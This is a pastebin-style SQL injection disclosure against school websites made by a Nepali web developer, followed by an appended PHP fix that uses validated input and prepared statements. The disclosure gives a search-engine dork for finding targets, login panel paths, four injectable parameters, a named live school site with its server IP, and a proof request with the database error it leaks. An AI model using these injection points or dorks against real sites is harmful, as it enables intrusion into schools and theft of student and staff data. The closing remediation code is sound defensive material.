KingSkrupellos

Iceberg Technology Software Nepal SQL Injection

Jan 8th, 2019
#########################################################

# Exploit Title : Iceberg Technology Software Nepal SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : icebergtechnepal.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''Developed by:Iceberg Technology'' site:edu.np
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity Exploit Reference Link : cxsecurity.com/issue/WLB-2019010052

#########################################################

# Admin/Teacher/Student Panel Login Path :
**************************************

/teacher/index.php
/student/index.php

# SQL Injection Exploit :
*********************

/news.php?id=[SQL Injection]

/photo.php?edit=[SQL Injection]

/about.php?Title=[SQL Injection]

/admission.php?Title=[SQL Injection]

#########################################################

# Example Vulnerable Site =>
**************************

Note => (192.185.142.207) => There are 57 domains hosted on this server.

[+] basiclearning.edu.np/news.php?id=42%27 =>

[ Proof of Concept ] => archive.fo/5ILQG

#########################################################

# SQL Database Error :
********************

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/basiclea/public_html/news.php on line 24

#########################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#########################################################
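
The warning quoted above shows news.php handing a failed query result (boolean false) to mysql_fetch_array() and printing the error, including the server path, to the visitor. The corrected lookup for the `id` parameter could look like the following, which is an added example and not the vendor's or the author's code; the `news` table, its columns and the function names are assumptions, and an in-memory SQLite database stands in for the site's MySQL server.

```php
<?php
// Added example, not the vendor's code. The `news` table, its columns,
// open_demo_db() and fetch_news() are hypothetical names; SQLite in memory
// replaces MySQL so the script runs offline.
declare(strict_types=1);

ini_set('display_errors', '0');   // keep warnings and file paths out of the response
ini_set('log_errors', '1');       // record them server-side instead

function open_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
    $db->exec("INSERT INTO news VALUES (42, 'Constructed sample title', 'Constructed sample body')");
    return $db;
}

// Returns the row for a valid id, or null when the value is not a positive
// integer or no such row exists. The raw value never becomes part of the SQL text.
function fetch_news(PDO $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                       // "42'" is rejected here
    }
    try {
        $stmt = $db->prepare('SELECT id, title, body FROM news WHERE id = :id');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        error_log('news lookup failed: ' . $e->getMessage());
        return null;                       // fail closed, no detail to the client
    }
    return $row === false ? null : $row;   // fetch() yields false when no row matches
}

$db = open_demo_db();
// Constructed inputs; "42'" is the decoded form of the id=42%27 request on this page.
foreach (['42', "42'", '999', ''] as $input) {
    $row = fetch_news($db, $input);
    printf("%-6s => %s\n", var_export($input, true),
        $row === null ? 'not found' : htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8'));
}
```

The same pattern applies to the `edit` and `Title` parameters listed above, with string values bound as `PDO::PARAM_STR` instead of being validated as integers.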